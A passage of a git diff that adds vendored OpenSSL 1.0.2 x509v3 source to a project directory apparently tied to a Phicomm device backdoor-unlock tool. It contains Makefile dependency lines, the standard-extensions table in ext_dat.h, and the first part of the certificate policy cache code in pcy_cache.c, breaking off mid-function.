+v3_ia5.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_ia5.o: ../cryptlib.h v3_ia5.c
+v3_info.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_info.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_info.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_info.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_info.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_info.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_info.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_info.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_info.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_info.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_info.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_info.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_info.o: ../cryptlib.h v3_info.c
+v3_int.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_int.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_int.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_int.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_int.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_int.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_int.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_int.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_int.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_int.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_int.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_int.o: ../cryptlib.h v3_int.c
+v3_lib.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_lib.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_lib.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_lib.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_lib.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_lib.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_lib.o: ../cryptlib.h ext_dat.h v3_lib.c
+v3_ncons.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_ncons.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_ncons.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_ncons.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_ncons.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_ncons.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_ncons.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_ncons.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_ncons.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_ncons.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_ncons.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_ncons.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_ncons.o: ../cryptlib.h v3_ncons.c
+v3_ocsp.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_ocsp.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_ocsp.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_ocsp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_ocsp.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_ocsp.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_ocsp.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+v3_ocsp.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_ocsp.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_ocsp.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_ocsp.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_ocsp.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_ocsp.o: ../cryptlib.h v3_ocsp.c
+v3_pci.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_pci.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_pci.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_pci.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_pci.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_pci.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_pci.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_pci.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_pci.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_pci.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_pci.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_pci.o: ../cryptlib.h v3_pci.c
+v3_pcia.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+v3_pcia.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_pcia.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_pcia.o: ../../include/openssl/e_os2.h ../../include/openssl/evp.h
+v3_pcia.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_pcia.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_pcia.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_pcia.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_pcia.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_pcia.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_pcia.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_pcia.o: v3_pcia.c
+v3_pcons.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_pcons.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_pcons.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_pcons.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_pcons.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_pcons.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_pcons.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_pcons.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_pcons.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_pcons.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_pcons.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_pcons.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_pcons.o: ../cryptlib.h v3_pcons.c
+v3_pku.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_pku.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_pku.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_pku.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_pku.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_pku.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_pku.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_pku.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_pku.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_pku.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_pku.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_pku.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_pku.o: ../cryptlib.h v3_pku.c
+v3_pmaps.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_pmaps.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_pmaps.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_pmaps.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_pmaps.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_pmaps.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_pmaps.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_pmaps.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_pmaps.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_pmaps.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_pmaps.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_pmaps.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_pmaps.o: ../cryptlib.h v3_pmaps.c
+v3_prn.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_prn.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_prn.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_prn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_prn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_prn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_prn.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_prn.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_prn.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_prn.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_prn.o: ../cryptlib.h v3_prn.c
+v3_purp.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_purp.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_purp.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_purp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_purp.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_purp.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_purp.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_purp.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+v3_purp.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_purp.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+v3_purp.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_purp.o: ../../include/openssl/x509v3.h ../cryptlib.h v3_purp.c
+v3_scts.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_scts.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_scts.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_scts.o: ../../include/openssl/dsa.h ../../include/openssl/dtls1.h
+v3_scts.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_scts.o: ../../include/openssl/evp.h ../../include/openssl/hmac.h
+v3_scts.o: ../../include/openssl/kssl.h ../../include/openssl/lhash.h
+v3_scts.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_scts.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_scts.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+v3_scts.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+v3_scts.o: ../../include/openssl/pqueue.h ../../include/openssl/rsa.h
+v3_scts.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_scts.o: ../../include/openssl/srtp.h ../../include/openssl/ssl.h
+v3_scts.o: ../../include/openssl/ssl2.h ../../include/openssl/ssl23.h
+v3_scts.o: ../../include/openssl/ssl3.h ../../include/openssl/stack.h
+v3_scts.o: ../../include/openssl/symhacks.h ../../include/openssl/tls1.h
+v3_scts.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_scts.o: ../../include/openssl/x509v3.h ../../ssl/ssl_locl.h ../cryptlib.h
+v3_scts.o: v3_scts.c
+v3_skey.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_skey.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_skey.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_skey.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_skey.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_skey.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_skey.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_skey.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+v3_skey.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_skey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+v3_skey.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_skey.o: ../../include/openssl/x509v3.h ../cryptlib.h v3_skey.c
+v3_sxnet.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_sxnet.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_sxnet.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_sxnet.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_sxnet.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_sxnet.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_sxnet.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_sxnet.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_sxnet.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_sxnet.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_sxnet.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_sxnet.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_sxnet.o: ../cryptlib.h v3_sxnet.c
+v3_utl.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_utl.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+v3_utl.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_utl.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_utl.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_utl.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_utl.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_utl.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+v3_utl.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_utl.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+v3_utl.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_utl.o: ../../include/openssl/x509v3.h ../cryptlib.h v3_utl.c
+v3err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3err.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3err.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3err.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3err.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3err.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3err.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3err.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3err.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3err.o: v3err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/ext_dat.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/ext_dat.h
new file mode 100644
index 0000000..c3a6fce
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/ext_dat.h
@@ -0,0 +1,136 @@
+/* ext_dat.h */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* This file contains a table of "standard" extensions */
+
+extern X509V3_EXT_METHOD v3_bcons, v3_nscert, v3_key_usage, v3_ext_ku;
+extern X509V3_EXT_METHOD v3_pkey_usage_period, v3_sxnet, v3_info, v3_sinfo;
+extern X509V3_EXT_METHOD v3_ns_ia5_list[], v3_alt[], v3_skey_id, v3_akey_id;
+extern X509V3_EXT_METHOD v3_crl_num, v3_crl_reason, v3_crl_invdate;
+extern X509V3_EXT_METHOD v3_delta_crl, v3_cpols, v3_crld, v3_freshest_crl;
+extern X509V3_EXT_METHOD v3_ocsp_nonce, v3_ocsp_accresp, v3_ocsp_acutoff;
+extern X509V3_EXT_METHOD v3_ocsp_crlid, v3_ocsp_nocheck, v3_ocsp_serviceloc;
+extern X509V3_EXT_METHOD v3_crl_hold, v3_pci;
+extern X509V3_EXT_METHOD v3_policy_mappings, v3_policy_constraints;
+extern X509V3_EXT_METHOD v3_name_constraints, v3_inhibit_anyp, v3_idp;
+extern X509V3_EXT_METHOD v3_addr, v3_asid;
+extern X509V3_EXT_METHOD v3_ct_scts[];
+
+/*
+ * This table will be searched using OBJ_bsearch so it *must* kept in order
+ * of the ext_nid values.
+ */
+
+static const X509V3_EXT_METHOD *standard_exts[] = {
+    &v3_nscert,
+    &v3_ns_ia5_list[0],
+    &v3_ns_ia5_list[1],
+    &v3_ns_ia5_list[2],
+    &v3_ns_ia5_list[3],
+    &v3_ns_ia5_list[4],
+    &v3_ns_ia5_list[5],
+    &v3_ns_ia5_list[6],
+    &v3_skey_id,
+    &v3_key_usage,
+    &v3_pkey_usage_period,
+    &v3_alt[0],
+    &v3_alt[1],
+    &v3_bcons,
+    &v3_crl_num,
+    &v3_cpols,
+    &v3_akey_id,
+    &v3_crld,
+    &v3_ext_ku,
+    &v3_delta_crl,
+    &v3_crl_reason,
+#ifndef OPENSSL_NO_OCSP
+    &v3_crl_invdate,
+#endif
+    &v3_sxnet,
+    &v3_info,
+#ifndef OPENSSL_NO_RFC3779
+    &v3_addr,
+    &v3_asid,
+#endif
+#ifndef OPENSSL_NO_OCSP
+    &v3_ocsp_nonce,
+    &v3_ocsp_crlid,
+    &v3_ocsp_accresp,
+    &v3_ocsp_nocheck,
+    &v3_ocsp_acutoff,
+    &v3_ocsp_serviceloc,
+#endif
+    &v3_sinfo,
+    &v3_policy_constraints,
+#ifndef OPENSSL_NO_OCSP
+    &v3_crl_hold,
+#endif
+    &v3_pci,
+    &v3_name_constraints,
+    &v3_policy_mappings,
+    &v3_inhibit_anyp,
+    &v3_idp,
+    &v3_alt[2],
+    &v3_freshest_crl,
+    &v3_ct_scts[0],
+    &v3_ct_scts[1],
+};
+
+/* Number of standard extensions */
+
+#define STANDARD_EXTENSION_COUNT (sizeof(standard_exts)/sizeof(X509V3_EXT_METHOD *))
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_cache.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_cache.c
new file mode 100644
index 0000000..c8f41f2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/pcy_cache.c
@@ -0,0 +1,269 @@
+/* pcy_cache.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2004.
+ */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+#include "pcy_int.h"
+
+static int policy_data_cmp(const X509_POLICY_DATA *const *a,
+                           const X509_POLICY_DATA *const *b);
+static int policy_cache_set_int(long *out, ASN1_INTEGER *value);
+
+/*
+ * Set cache entry according to CertificatePolicies extension. Note: this
+ * destroys the passed CERTIFICATEPOLICIES structure.
+ */
+
+static int policy_cache_create(X509 *x,
+                               CERTIFICATEPOLICIES *policies, int crit)
+{
+    int i;
+    int ret = 0;
+    X509_POLICY_CACHE *cache = x->policy_cache;
+    X509_POLICY_DATA *data = NULL;
+    POLICYINFO *policy;
+    if (sk_POLICYINFO_num(policies) == 0)
+        goto bad_policy;
+    cache->data = sk_X509_POLICY_DATA_new(policy_data_cmp);
+    if (!cache->data)
+        goto bad_policy;
+    for (i = 0; i < sk_POLICYINFO_num(policies); i++) {
+        policy = sk_POLICYINFO_value(policies, i);
+        data = policy_data_new(policy, NULL, crit);
+        if (!data)
+            goto bad_policy;
+        /*
+         * Duplicate policy OIDs are illegal: reject if matches found.
+         */
+        if (OBJ_obj2nid(data->valid_policy) == NID_any_policy) {
+            if (cache->anyPolicy) {
+                ret = -1;
+                goto bad_policy;
+            }
+            cache->anyPolicy = data;
+        } else if (sk_X509_POLICY_DATA_find(cache->data, data) != -1) {
+            ret = -1;
+            goto bad_policy;
+        } else if (!sk_X509_POLICY_DATA_push(cache->data, data))
+            goto bad_policy;
+        data = NULL;
+    }
+    ret = 1;
+ bad_policy:
+    if (ret == -1)
+        x->ex_flags |= EXFLAG_INVALID_POLICY;
+    if (data)
+        policy_data_free(data);
+    sk_POLICYINFO_pop_free(policies, POLICYINFO_free);
+    if (ret <= 0) {
+        sk_X509_POLICY_DATA_pop_free(cache->data, policy_data_free);
+        cache->data = NULL;
+    }
+    return ret;
+}
+
+static int policy_cache_new(X509 *x)
+{
+    X509_POLICY_CACHE *cache;
+    ASN1_INTEGER *ext_any = NULL;
+    POLICY_CONSTRAINTS *ext_pcons = NULL;
+    CERTIFICATEPOLICIES *ext_cpols = NULL;
+    POLICY_MAPPINGS *ext_pmaps = NULL;
+    int i;
+    cache = OPENSSL_malloc(sizeof(X509_POLICY_CACHE));
+    if (!cache)
+        return 0;
+    cache->anyPolicy = NULL;
+    cache->data = NULL;
+    cache->any_skip = -1;
+    cache->explicit_skip = -1;
+    cache->map_skip = -1;
+
+    x->policy_cache = cache;
+
+    /*
+     * Handle requireExplicitPolicy *first*. Need to process this even if we
+     * don't have any policies.
+     */
+    ext_pcons = X509_get_ext_d2i(x, NID_policy_constraints, &i, NULL);
+
+    if (!ext_pcons) {
+        if (i != -1)
+            goto bad_cache;
+    } else {
+        if (!ext_pcons->requireExplicitPolicy
+            && !ext_pcons->inhibitPolicyMapping)
+            goto bad_cache;
+        if (!policy_cache_set_int(&cache->explicit_skip,
+                                  ext_pcons->requireExplicitPolicy))
+            goto bad_cache;
+        if (!policy_cache_set_int(&cache->map_skip,
+                                  ext_pcons->inhibitPolicyMapping))
+            goto bad_cache;
+    }
+
+    /* Process CertificatePolicies */
+
+    ext_cpols = X509_get_ext_d2i(x, NID_certificate_policies, &i, NULL);
+    /*
+     * If no CertificatePolicies extension or problem decoding then there is
+     * no point continuing because the valid policies will be NULL.
+     */
+    if (!ext_cpols) {
+        /* If not absent some problem with extension */
+        if (i != -1)
+            goto bad_cache;
+        return 1;
+    }
+
+    i = policy_cache_create(x, ext_cpols, i);
+
+    /* NB: ext_cpols freed by policy_cache_set_policies */
+
+    if (i <= 0)
+        return i;
+
+    ext_pmaps = X509_get_ext_d2i(x, NID_policy_mappings, &i, NULL);
+
+    if (!ext_pmaps) {
+        /* If not absent some problem with extension */
+        if (i != -1)
+            goto bad_cache;
+    } else {
+        i = policy_cache_set_mapping(x, ext_pmaps);
+        if (i <= 0)
+            goto bad_cache;
+    }
+
